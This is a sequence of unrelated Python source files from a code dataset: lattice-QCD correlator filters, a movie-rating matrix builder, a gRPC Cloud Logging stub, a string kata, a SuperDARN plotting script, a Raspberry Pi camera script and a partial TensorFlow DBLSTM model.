first_piN2piN_properties_type(default_input_data_properties_type):\n\n\tdef get_real_dia(self,ctc,dia):\n\t\tif ctc[\"name\"] == \"pixN-pixN\":\n\t\t# pixN-pixN/diag3 <-> diag2\n\t\t# pixN-pixN/sample0/diag0 <-> diag1\n\t\t\tif dia == 5:\n\t\t\t\treturn 4\n\t\t\tif dia == 4:\n\t\t\t\treturn 5\n\t\t\tif dia == 8:\n\t\t\t\treturn 9\n\t\t\tif dia == 9:\n\t\t\t\treturn 8\n\t\treturn dia\n\n\tdef get_factor_for_diagram(self,ctc,dia):\n\t\treturn np.complex128(self.get_factor_for_correlator(ctc)*get_correction_factor_for_old_piN2piN_executable(ctc))\n\nclass piN2piN_2ndversion_properties_type(default_input_data_properties_type):\n\n\tdef phase_multiplied(self,ctc,dia):\n\t\tname = ctc[\"name\"]\n\t\tif name == \"D-D\":\n\t\t\treturn True\n\t\tif name == \"pixN-D\":\n\t\t\treturn True\n\t\treturn False\n\n\tdef get_aff_filename(self,ctc,dia,tsrc,conf):\n\t\ttype = get_aff_type_2ndversion(ctc,dia)\n\t\tsamplestr = \"\"\n\t\tif type == \"piN_piN_oet\" or type == \"pi_pi_oet\":\n\t\t\tsamplestr = \".sample00\"\n\t\treturn \"%s.%04d%s.tsrc%02d.aff\" % (type,conf,samplestr,tsrc)\n\n\ndef get_all_sub_combinations(l):\n\tres = None\n\tif len(l) > 1:\n\t\tl2 = []\n\t\tfor i in range(1,len(l)):\n\t\t\tl2.append(l[i])\n\t\tres = get_all_combinations(l2)\n\treturn res\n\ndef create_new_comb_list(l):\n\tres = []\n\tfor e in l:\n\t\tres.append([e])\n\treturn res\n\ndef new_list_with_element_at_front(e,l):\n\tnewlist = []\n\tnewlist.append(e)\n\tfor e2 in l:\n\t\tnewlist.append(e2)\n\treturn newlist\n\ndef get_all_combinations(l):\n\tprevres = get_all_sub_combinations(l)\n\n\tres = []\n\tif prevres == None:\n\t\tif l[0] != None:\n\t\t\tres = create_new_comb_list(l[0])\n\t\telse:\n\t\t\tres = [[None]]\n\telse:\n\t\tif l[0] == None:\n\t\t\tfor e2 in prevres:\n\t\t\t\tres.append(new_list_with_element_at_front(None,e2))\n\t\telse:\n\t\t\tfor e1 in l[0]:\n\t\t\t\tfor e2 in prevres:\n\t\t\t\t\tres.append(new_list_with_element_at_front(e1,e2))\n\treturn res\t\t\t\n\ndef create_list_of_momenta_with_abs_smaller_than_one():\n\tlist_of_momenta = []\n\tlist_of_momenta.append([0,0,0])\n\tfor sign in [+1,-1]:\n\t\tfor i in range(0,3):\n\t\t\tmomentum = [0,0,0]\n\t\t\tmomentum[i] = sign\n\t\t\tlist_of_momenta.append(momentum)\n\treturn list_of_momenta\n\nclass interpolating_fields_description_type:\n\n\tdef __init__(self):\n\t\tself.seq_source_momenta = []\n\t\tself.seq2_source_momenta = []\n\t\tself.sink_momenta = []\n\t\tself.gamma_component_N_N = []\n\t\tself.gamma_component_D_D = []\n\t\tself.gamma_component_piN_D = []\n\t\tself.gamma_component_piN_piN = []\n\nclass int_fields_for_first_runs_description_type(interpolating_fields_description_type):\n\n\tdef __init__(self):\n\t\tself.seq_source_momenta = create_list_of_momenta_with_abs_smaller_than_one()\n\t\tself.seq2_source_momenta = create_list_of_momenta_with_abs_smaller_than_one()\n\t\tself.sink_momenta = create_list_of_momenta_with_abs_smaller_than_one()\n\t\tN_gammas = [5,4,6]\n\t\tD_gammas = [1,2,3]\n\t\tself.gamma_component_N_N = get_all_combinations([N_gammas,N_gammas])\n\t\tself.gamma_component_D_D = get_all_combinations([D_gammas,D_gammas])\n\t\tself.gamma_component_piN_D = get_all_combinations([D_gammas,N_gammas])\n\t\tself.gamma_component_piN_piN = get_all_combinations([N_gammas,N_gammas])\n\nclass information_about_contraction_computation_in_first_runs_type:\n\n\tdef __init__(self):\n\t\tself.source_coords = \"random.max_timeslice_sep\"\n\t\tself.num_coords = 4\n\t\tself.num_coherent_sources = 2\n\t\tself.samples = 12\n\t\tself.samples_oet = 1\n\nclass information_about_first_runs_type:\n\n\tdef __init__(self):\n\t\tself.int_fields_info = int_fields_for_first_runs_description_type()\n\t\tself.contr_comp_info = information_about_contraction_computation_in_first_runs_type()\n\n\tdef get_source_timeslices(self):\n\t\treturn \"random.max_timeslice_sep\"\n\n\ndef append_p1_cc_pi_pi_for_momenta(l,pi1,pf1,source_timeslices):\n\tcc = {}\n\tcc[\"name\"] = \"pi-pi\"\n\tcc[\"pi1\"] = pi1\n\tcc[\"pf1\"] = pf1\n\tcc[\"source-timeslices\"] = source_timeslices\n\tcc[\"diagrams\"] = [0]\n\tl.append(cc)\n\ndef append_standard_TDD_cc(l,name,pf1=None,pf2=None,pi2=None,gammas=None,diagrams=None,source_timeslices=None):\n\tassert(gammas != None)\n\tassert(diagrams != None)\n\tcc = {}\n\tcc[\"name\"] = name\n\tif pf1 != None:\n\t\tcc[\"pf1\"] = pf1\n\tif pf2 != None:\n\t\tcc[\"pf2\"] = pf2\n\tif pi2 != None:\n\t\tcc[\"pi2\"] = pi2\n\tcc[\"gammas\"] = gammas\n\tcc[\"source-timeslices\"] = source_timeslices\n\tcc[\"diagrams\"] = diagrams\n\tl.append(cc)\n\ndef append_p1_cc_pi_pi(l,information_about_run):\n\tfor pi2 in information_about_run.int_fields_info.seq_source_momenta:\n\t\tfor pf2 in information_about_run.int_fields_info.seq2_source_momenta:\n\t\t\tappend_p1_cc_pi_pi_for_momenta(l,pi1=pi2,pf1=pf2,source_timeslices=information_about_run.get_source_timeslices())\n\ndef append_p1_cc_N_N(l,information_about_run):\n\tfor pf1 in information_about_run.int_fields_info.sink_momenta:\n\t\tappend_standard_TDD_cc(l,name=\"N-N\",pf1=pf1,gammas=[5,5],diagrams=range(0,2),source_timeslices=information_about_run.get_source_timeslices())\n\ndef append_p1_cc_D_D(l,information_about_run):\n\tfor pf1 in information_about_run.int_fields_info.sink_momenta:\n\t\tfor gammas in information_about_run.int_fields_info.gamma_component_D_D:\n\t\t\tappend_standard_TDD_cc(l,name=\"D-D\",pf1=pf1,gammas=gammas,diagrams=range(0,6),source_timeslices=information_about_run.get_source_timeslices())\n\ndef append_p1_cc_pixN_D(l,information_about_run):\n\tfor pf1 in information_about_run.int_fields_info.sink_momenta:\n\t\tfor pi2 in information_about_run.int_fields_info.seq_source_momenta:\n\t\t\tfor gammas in information_about_run.int_fields_info.gamma_component_piN_D:\n\t\t\t\tappend_standard_TDD_cc(l,name=\"pixN-D\",pf1=pf1,pi2=pi2,gammas=gammas,diagrams=range(0,6),source_timeslices=information_about_run.get_source_timeslices())\n\t\t\ndef append_p1_cc_pixN_pixN(l,information_about_run):\n\t\n\tfor pf1 in information_about_run.int_fields_info.sink_momenta:\n\t\tfor pf2 in information_about_run.int_fields_info.seq2_source_momenta:\n\t\t\tfor pi2 in information_about_run.int_fields_info.seq_source_momenta:\n\t\t\t\tappend_standard_TDD_cc(l,name=\"pixN-pixN\",pf1=pf1,pf2=pf2,pi2=pi2,gammas=[5,5],diagrams=range(0,12),source_timeslices=information_about_run.get_source_timeslices())\n\ndef get_ccs_for_run(information_about_run):\n\tl = []\n\tappend_p1_cc_pi_pi(l,information_about_run)\n\tappend_p1_cc_N_N(l,information_about_run)\n\tappend_p1_cc_D_D(l,information_about_run)\n\tappend_p1_cc_pixN_D(l,information_about_run)\n\tappend_p1_cc_pixN_pixN(l,information_about_run)\n\treturn l\n\t\t\ndef apply_filter_to_ccs(ccs,cc_filter):\n\tfiltered_ccs = []\n\tfor cc in ccs:\n\t\tif cc_filter(cc):\n\t\t\tfiltered_ccs.append(cc)\n\treturn filtered_ccs\n\ndef np_1d_arrays_are_equal(a1,a2):\n\tassert(len(a1.shape) == 1)\n\tassert(len(a2.shape) == 1)\n\tif a1.shape[0] != a2.shape[0]:\n\t\treturn False\n\tfor i in range(0,a1.shape[0]):\n\t\tif a1[i] != a2[i]:\n\t\t\treturn False\n\treturn True\n\ndef mom_is_zero(p):\n\treturn np_1d_arrays_are_equal(np.asarray(p),np.asarray([0,0,0]))\n\ndef get_mom_from_cc(momstr,cc):\n\tif momstr == \"pi1\":\n\t\treturn get_pi1_from_cc(cc)\n\n\tp = np.asarray([0,0,0])\n\tif momstr in cc:\n\t\tp = np.asarray(cc[momstr])\n\treturn p\n\ndef get_pi1_from_cc(cc):\n\tif \"pi1\" in cc:\n\t\treturn np.asarray(cc[\"pi1\"])\n\telse:\n\t\treturn calc_pi1(cc)\n\ndef total_initial_mom_is_zero(cc):\n\tpi1 = get_pi1_from_cc(cc)\n\tpi2 = get_mom_from_cc(\"pi2\",cc)\n\treturn mom_is_zero(pi1+pi2)\n\ndef total_final_mom_is_zero(cc):\n\tpf1 = get_mom_from_cc(\"pf1\",cc)\n\tpf2 = get_mom_from_cc(\"pf2\",cc)\n\treturn mom_is_zero(pf1+pf2)\t\n\ndef com_frame_filter(cc):\n\tif total_initial_mom_is_zero(cc) and total_final_mom_is_zero(cc):\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef standard_setup_filter(cc):\n\tif process_with_momenta_and_gammas_filter(\"pi-pi\",[0,0,0],None,[0,0,0],None,None,cc):\n\t\treturn True\n\n\tif process_with_momenta_and_gammas_filter(\"N-N\",[0,0,0],None,[0,0,0],None,[5,5],cc):\n\t\treturn True\n\n\tfor i in range(0,3):\n\n\t\tif process_with_momenta_and_gammas_filter(\"D-D\",[0,0,0],None,[0,0,0],None,[i+1,i+1],cc):\n\t\t\treturn True\n\n\t\tfor val in [1,-1]:\n\t\t\tp = np.asarray([0,0,0])\n\t\t\tp[i] = val\n\t\t\tif process_with_momenta_and_gammas_filter(\"pixN-D\",p,-p,[0,0,0],None,[i+1,5],cc):\n\t\t\t\treturn True\n\t\t\tif process_with_momenta_and_gammas_filter(\"pixN-pixN\",p,-p,-p,p,[5,5],cc):\n\t\t\t\treturn True\n\n\treturn False\n\ndef pixN_pixN_off_diagonal_filter(cc):\n\n\tfor i in range(0,3):\n\n\t\tfor val in [1,-1]:\n\t\t\tp = np.asarray([0,0,0])\n\t\t\tp[i] = val\n\t\t\tif process_with_momenta_and_gammas_filter(\"pixN-pixN\",p,-p,p,-p,[5,5],cc):\n\t\t\t\treturn True\n\n\treturn False\n\ndef baryon_2pt_3pt_filter(cc):\n\tif not (cc[\"name\"] == \"N-N\" or cc[\"name\"] == \"pixN-D\" or cc[\"name\"] == \"D-D\"):\n\t\treturn False\n\treturn True\n\ndef mom_filter_check(cc,momstr,mom):\n\tif mom == None:\n\t\treturn True\n\tif not momstr == \"pi1\" and not momstr in cc:\n\t\treturn False\n\treturn np_1d_arrays_are_equal(get_mom_from_cc(momstr,cc),np.asarray(mom))\n\ndef process_with_momenta_filter(process_name,pi1,pi2,pf1,pf2,cc):\n\tif cc[\"name\"] != process_name:\n\t\treturn False\n\n\tif not mom_filter_check(cc,\"pf1\",pf1):\n\t\treturn False\n\tif not mom_filter_check(cc,\"pf2\",pf2):\n\t\treturn False\n\tif not mom_filter_check(cc,\"pi1\",pi1):\n\t\treturn False\n\tif not mom_filter_check(cc,\"pi2\",pi2):\n\t\treturn False\n\n\treturn True\n\ndef gamma_filter_check(cc,gammas):\n\tif not \"gammas\" in cc:\n\t\tif gammas is None:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\treturn np_1d_arrays_are_equal(np.asarray(cc[\"gammas\"]),np.asarray(gammas))\n\ndef process_with_momenta_and_gammas_filter(process_name,pi1,pi2,pf1,pf2,gammas,cc):\n\tif cc[\"name\"] != process_name:\n\t\treturn False\n\n\tif not mom_filter_check(cc,\"pf1\",pf1):\n\t\treturn False\n\tif not mom_filter_check(cc,\"pf2\",pf2):\n\t\treturn False\n\tif not mom_filter_check(cc,\"pi1\",pi1):\n\t\treturn False\n\tif not mom_filter_check(cc,\"pi2\",pi2):\n\t\treturn False\n\n\tif not gamma_filter_check(cc,gammas):\n\t\treturn False\n\n\treturn True\n\n\n","sub_path":"project_information.py","file_name":"project_information.py","file_ext":"py","file_size_in_byte":12735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"220174491","text":"import csv\nimport pickle\nfrom movies import Movies, Ratings\nfrom csvreader import save_list_object\nimport numpy as np\nfrom utilityfunctions import read_object, get_key, save_list_object\n\n\nmovies_list = read_object('objects/test100/movie_list.pkl')\nratings_list_base = read_object('objects/test100/rating_list_base.pkl')\nratings_list_test = read_object('objects/test100/rating_list_test.pkl')\n\nno_of_users = int(ratings_list_base[len(ratings_list_base)-1].user_id)\nno_of_movies = int(len(movies_list))\n\nmovie_id_mapper = {}\n\n\ncount = 0\nfor movie in movies_list:\n movie_id_mapper[movie.movie_id] = count\n count += 1\n\nbase_matrix = []\ntest_matrix = []\n\nfor i in range(0, no_of_users, 1):\n new_row = []\n for j in range(0, no_of_movies, 1):\n new_row.append(0)\n base_matrix.append(new_row)\n\nfor base_rating in ratings_list_base:\n x = int(base_rating.user_id)\n y = base_rating.movie_id\n z = int(movie_id_mapper[y])\n #print('Movie id = ', y, 'Index = ', z)\n base_matrix[x-1][z] = float(base_rating.rating)\n\nfor i in range(0, no_of_users, 1):\n new_row = []\n for j in range(0, no_of_movies, 1):\n new_row.append(0)\n test_matrix.append(new_row)\n\nfor test_rating in ratings_list_test:\n x = int(test_rating.user_id)\n y = test_rating.movie_id\n z = int(movie_id_mapper[y])\n #print('Movie id = ', y, 'Index = ', z)\n test_matrix[x-1][z] = float(test_rating.rating)\n\n\nsave_list_object(base_matrix, 'objects/test100/base_matrix.pkl')\nsave_list_object(test_matrix, 'objects/test100/test_matrix.pkl')\nsave_list_object(movie_id_mapper, 'objects/test100/movie_mapper.pkl')\n\n'''\n\n#Loading saved matrix and movie mapper dictionary from pickle file#\n\nload_base_matrix = read_object('objects/test100/base_matrix.pkl')\nload_test_matrix = read_object('objects/test100/test_matrix.pkl')\nmovie_id_mapper = read_object('objects/test100/movie_mapper.pkl')\n\n\ny = np.array([np.array(row) for row in load_base_matrix])\nz = np.array([np.array(row) for row in load_test_matrix])\n\n\nfor i in range(no_of_users):\n for j in range(no_of_movies):\n if int(y[i][j]) != 0:\n print(i+1, get_key(movie_id_mapper, j), y[i][j])\n\nfor i in range(no_of_users):\n for j in range(no_of_movies):\n if int(z[i][j]) != 0:\n print(i+1, get_key(movie_id_mapper, j), z[i][j])\n\n\n\n'''","sub_path":"recommendersystems/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"384484779","text":"import grpc\nfrom grpc.framework.common import cardinality\nfrom grpc.framework.interfaces.face import utilities as face_utilities\n\nimport google.cloud.grpc.logging.v2.logging_pb2 as google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2\nimport google.protobuf.empty_pb2 as google_dot_protobuf_dot_empty__pb2\nimport google.cloud.grpc.logging.v2.logging_pb2 as google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2\nimport google.cloud.grpc.logging.v2.logging_pb2 as google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2\nimport google.cloud.grpc.logging.v2.logging_pb2 as google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2\nimport google.cloud.grpc.logging.v2.logging_pb2 as google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2\nimport google.cloud.grpc.logging.v2.logging_pb2 as google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2\nimport google.cloud.grpc.logging.v2.logging_pb2 as google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2\n\n\nclass LoggingServiceV2Stub(object):\n \"\"\"Service for ingesting and querying logs.\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.DeleteLog = channel.unary_unary(\n '/google.logging.v2.LoggingServiceV2/DeleteLog',\n request_serializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.DeleteLogRequest.SerializeToString,\n response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,\n )\n self.WriteLogEntries = channel.unary_unary(\n '/google.logging.v2.LoggingServiceV2/WriteLogEntries',\n request_serializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.WriteLogEntriesRequest.SerializeToString,\n response_deserializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.WriteLogEntriesResponse.FromString,\n )\n self.ListLogEntries = channel.unary_unary(\n '/google.logging.v2.LoggingServiceV2/ListLogEntries',\n request_serializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.ListLogEntriesRequest.SerializeToString,\n response_deserializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.ListLogEntriesResponse.FromString,\n )\n self.ListMonitoredResourceDescriptors = channel.unary_unary(\n '/google.logging.v2.LoggingServiceV2/ListMonitoredResourceDescriptors',\n request_serializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.ListMonitoredResourceDescriptorsRequest.SerializeToString,\n response_deserializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.ListMonitoredResourceDescriptorsResponse.FromString,\n )\n\n\nclass LoggingServiceV2Servicer(object):\n \"\"\"Service for ingesting and querying logs.\n \"\"\"\n\n def DeleteLog(self, request, context):\n \"\"\"Deletes all the log entries in a log.\n The log reappears if it receives new entries.\n \"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def WriteLogEntries(self, request, context):\n \"\"\"Writes log entries to Stackdriver Logging. All log entries are\n written by this method.\n \"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def ListLogEntries(self, request, context):\n \"\"\"Lists log entries. Use this method to retrieve log entries from Cloud\n Logging. For ways to export log entries, see\n [Exporting Logs](/logging/docs/export).\n \"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def ListMonitoredResourceDescriptors(self, request, context):\n \"\"\"Lists the monitored resource descriptors used by Stackdriver Logging.\n \"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_LoggingServiceV2Servicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'DeleteLog': grpc.unary_unary_rpc_method_handler(\n servicer.DeleteLog,\n request_deserializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.DeleteLogRequest.FromString,\n response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,\n ),\n 'WriteLogEntries': grpc.unary_unary_rpc_method_handler(\n servicer.WriteLogEntries,\n request_deserializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.WriteLogEntriesRequest.FromString,\n response_serializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.WriteLogEntriesResponse.SerializeToString,\n ),\n 'ListLogEntries': grpc.unary_unary_rpc_method_handler(\n servicer.ListLogEntries,\n request_deserializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.ListLogEntriesRequest.FromString,\n response_serializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.ListLogEntriesResponse.SerializeToString,\n ),\n 'ListMonitoredResourceDescriptors': grpc.unary_unary_rpc_method_handler(\n servicer.ListMonitoredResourceDescriptors,\n request_deserializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.ListMonitoredResourceDescriptorsRequest.FromString,\n response_serializer=google_dot_cloud_dot_grpc_dot_logging_dot_v2_dot_logging__pb2.ListMonitoredResourceDescriptorsResponse.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'google.logging.v2.LoggingServiceV2', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n","sub_path":"Android App/clothonfly webapp/env/lib/python3.7/site-packages/google/cloud/grpc/logging/v2/logging_pb2_grpc.py","file_name":"logging_pb2_grpc.py","file_ext":"py","file_size_in_byte":5868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"364521845","text":"def make_char_freq(s):\n char_pool = {}\n for i in s:\n if i in char_pool:\n char_pool[i] += 1\n else:\n char_pool[i] = 1\n return char_pool\n\n\ndef scramble(s1, s2):\n char_pool = make_char_freq(s1)\n char_needed = make_char_freq(s2)\n\n for char in char_needed:\n num_needed = char_needed[char]\n if char not in char_pool or char_pool[char] < num_needed:\n return False\n\n return True\n\n\nprint(scramble('rkqodlw', 'world'))\nprint(scramble('cedewaraaossoqqyt', 'codewars'))\nprint(scramble('katas', 'steak'))\nprint(scramble('scriptjava', 'javascript'))\nprint(scramble('scriptingjava', 'javascript'))\n","sub_path":"Codewars/5kyu/scrambles.py","file_name":"scrambles.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"142850050","text":"#!/usr/bin/env python\n\n\"\"\"fitacf_plots.py: module is dedicated to produce plots for fitacf++ datafiles.\"\"\"\n\n__author__ = \"Chakraborty, S.\"\n__copyright__ = \"Copyright 2021, SuperDARN@VT\"\n__credits__ = []\n__license__ = \"MIT\"\n__version__ = \"1.0.\"\n__maintainer__ = \"Chakraborty, S.\"\n__email__ = \"shibaji7@vt.edu\"\n__status__ = \"Research\"\n\n\nimport numpy as np\nnp.random.seed(0)\nimport sys\nsys.path.append(\"sd/\")\nsys.path.append(\"tools/\")\nimport datetime as dt\nimport argparse\nfrom dateutil import parser as prs\nfrom loguru import logger\nimport json\n\nfrom plot_processed_data import PlotProcessedData\n\ndef run_fitacf_amgeo_plotting(param_file, rad, start, end, sim_id, cid, verbose):\n \"\"\"\n Method is dedicated to run fitacf++ output plotts\n \n Input parameters\n ----------------\n param_file : Parameter file .json\n rad : Radar code\n start : Start datetime object\n end : End datetime object\n sim_id : Simulation ID\n verbose : If true print console\n \n Return parameters\n -----------------\n _dict_ {\n folder_location : folder location to that generates \n }\n \"\"\"\n scan_info = None\n if param_file is None: scan_info = fetch_print_fit_rec(rad, start, start + dt.timedelta(minutes=5))\n proc = PlotProcessedData(param_file, rad, [start, end], sim_id, scan_info, cid, verbose)\n return proc.out\n\n# Script run can also be done via main program\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-p\", \"--param_file\", default=\"data/outputs/L101/bks/params.json\", \n help=\"Output parameter file from the fitacf++ run\")\n parser.add_argument(\"-r\", \"--rad\", default=None, help=\"SuperDARN radar code\")\n parser.add_argument(\"-s\", \"--start\", default=None, help=\"Start date (e.g. 2015-03-17T03)\", type=prs.parse)\n parser.add_argument(\"-e\", \"--end\", default=None, help=\"End date (e.g. 2015-03-17T03:02)\", type=prs.parse)\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_false\", help=\"Increase output verbosity (default True)\")\n parser.add_argument(\"-sid\", \"--sim_id\", default=\"L100\", help=\"Simulation ID, need to store data into this folder (default L100)\")\n parser.add_argument(\"-cid\", \"--cluster_id\", default=None, type=int, help=\"Cluster ID related plot\")\n args = parser.parse_args()\n logger.info(f\"Simulation run using fitacf_plots.__main__\")\n if args.verbose:\n logger.info(\"Parameter list for plotting simulation \")\n for k in vars(args).keys():\n print(\" \", k, \"->\", vars(args)[k])\n _o = run_fitacf_amgeo_plotting(args.param_file, args.rad, args.start, args.end, args.sim_id, args.cluster_id, args.verbose)\n logger.info(f\"Simulation output from fitacf_plots.__main__\\n{json.dumps(_o, sort_keys=True, indent=4)}\")\n pass","sub_path":"fitacf_plots.py","file_name":"fitacf_plots.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"50532394","text":"from picamera import PiCamera\nfrom time import sleep\nfrom datetime import datetime, time\nimport datetime\n\ndef cheese():\n camera=PiCamera()\n camera.start_preview()\n sleep(2) \n camera.capture('/home/honky/server/static/pics/garden-now.jpg')\n camera.stop_preview()\n camera.close()\n\ndef update():\n timenow = datetime.datetime.now()\n camera=PiCamera()\n camera.start_preview()\n sleep(2) \n camera.capture('/home/honky/server/static/pics/' + timenow.strftime('%m-%d-%y') + '.jpg')\n camera.stop_preview()\n camera.close()\n\n print(\"Yippy dippy doo\")\n","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"109852057","text":"from __Base.BaseClass import NeuralNetwork_Base\nfrom DepressionRecognition.Tools import Shuffle_Part3\nimport numpy\nimport tensorflow\nfrom tensorflow.contrib import rnn\n\n\nclass DBLSTM(NeuralNetwork_Base):\n def __init__(self, trainData, trainLabel, trainSeq, featureShape=40, firstAttention=None, secondAttention=None,\n firstAttentionScope=None, secondAttentionScope=None, firstAttentionName=None, secondAttentionName=None,\n batchSize=32, rnnLayers=2, hiddenNodules=128, learningRate=1E-3, startFlag=True, graphRevealFlag=True,\n graphPath='logs/', occupyRate=-1, lossType='RMSE'):\n self.seq = trainSeq\n self.featureShape = featureShape\n self.firstAttention, self.secondAttention = firstAttention, secondAttention\n\n self.firstAttentionScope, self.secondAttentionScope = firstAttentionScope, secondAttentionScope\n self.firstAttentionName, self.secondAttentionName = firstAttentionName, secondAttentionName\n\n self.rnnLayers, self.hiddenNodules = rnnLayers, hiddenNodules\n self.lossType = lossType\n\n super(DBLSTM, self).__init__(trainData=trainData, trainLabel=trainLabel, batchSize=batchSize,\n learningRate=learningRate, startFlag=startFlag, graphRevealFlag=graphRevealFlag,\n graphPath=graphPath, occupyRate=occupyRate)\n\n def BuildNetwork(self, learningRate):\n self.dataInput = tensorflow.placeholder(dtype=tensorflow.float32, shape=[None, None, self.featureShape],\n name='dataInput')\n self.labelInput = tensorflow.placeholder(dtype=tensorflow.float32, shape=None, name='labelInput')\n self.seqInput = tensorflow.placeholder(dtype=tensorflow.int64, shape=None, name='seqInput')\n\n ##########################################################################\n\n self.parameters['BatchSize'], self.parameters['TimeStep'], _ = tensorflow.unstack(\n tensorflow.shape(input=self.dataInput, name='Parameter'))\n\n ##########################################################################\n\n with tensorflow.variable_scope('First_BLSTM'):\n self.parameters['First_FW_Cell'] = tensorflow.nn.rnn_cell.MultiRNNCell(\n cells=[rnn.LSTMCell(num_units=self.hiddenNodules) for _ in range(self.rnnLayers)], state_is_tuple=True)\n self.parameters['First_BW_Cell'] = tensorflow.nn.rnn_cell.MultiRNNCell(\n cells=[rnn.LSTMCell(num_units=self.hiddenNodules) for _ in range(self.rnnLayers)], state_is_tuple=True)\n\n self.parameters['First_Output'], self.parameters['First_FinalState'] = \\\n tensorflow.nn.bidirectional_dynamic_rnn(cell_fw=self.parameters['First_FW_Cell'],\n cell_bw=self.parameters['First_BW_Cell'], inputs=self.dataInput,\n sequence_length=self.seqInput, dtype=tensorflow.float32)\n\n ##########################################################################\n\n if self.firstAttention is None:\n self.parameters['First_FinalOutput'] = tensorflow.concat(\n [self.parameters['First_FinalState'][self.rnnLayers - 1][0].h,\n self.parameters['First_FinalState'][self.rnnLayers - 1][1].h], axis=1)\n else:\n self.firstAttentionList = self.firstAttention(dataInput=self.parameters['First_Output'],\n scopeName=self.firstAttentionName,\n hiddenNoduleNumber=2 * self.hiddenNodules,\n attentionScope=self.firstAttentionScope, blstmFlag=True)\n self.parameters['First_FinalOutput'] = self.firstAttentionList['FinalResult']\n\n ##########################################################################\n\n with tensorflow.variable_scope('Second_BLSTM'):\n self.parameters['Second_FW_Cell'] = tensorflow.nn.rnn_cell.MultiRNNCell(\n cells=[rnn.LSTMCell(num_units=self.hiddenNodules) for _ in range(self.rnnLayers)],\n state_is_tuple=True)\n self.parameters['Second_BW_Cell'] = tensorflow.nn.rnn_cell.MultiRNNCell(\n cells=[rnn.LSTMCell(num_units=self.hiddenNodules) for _ in range(self.rnnLayers)],\n state_is_tuple=True)\n\n self.parameters['Second_Output'], self.parameters['Second_FinalState'] = \\\n tensorflow.nn.bidirectional_dynamic_rnn(\n cell_fw=self.parameters['Second_FW_Cell'], cell_bw=self.parameters['Second_BW_Cell'],\n inputs=self.parameters['First_FinalOutput'][tensorflow.newaxis, :, :],\n dtype=tensorflow.float32)\n\n ##########################################################################\n\n if self.secondAttention is None:\n self.parameters['Second_FinalOutput'] = tensorflow.concat(\n [self.parameters['Second_FinalState'][self.rnnLayers - 1][0].h,\n self.parameters['Second_FinalState'][self.rnnLayers - 1][1].h], axis=1)\n else:\n self.secondAttentionList = self.secondAttention(dataInput=self.parameters['Second_Output'],\n scopeName=self.secondAttentionName,\n hiddenNoduleNumber=2 * self.hiddenNodules,\n attentionScope=self.secondAttentionScope, blstmFlag=True)\n self.parameters['Second_FinalOutput'] = self.secondAttentionList['FinalResult']\n\n self.parameters['FinalPredict'] = tensorflow.reshape(\n tensor=tensorflow.layers.dense(inputs=self.parameters['Second_FinalOutput'], units=1,\n activation=None, name='FinalPredict'), shape=[1])\n\n if self.lossType == 'MSE':\n self.parameters['Loss'] = tensorflow.losses.mean_squared_error(labels=self.labelInput,\n predictions=self.parameters['FinalPredict'])\n if self.lossType == 'RMSE':\n self.parameters['Loss'] = tensorflow.sqrt(\n tensorflow.losses.mean_squared_error(labels=self.labelInput,\n predictions=self.parameters['FinalPredict']))\n 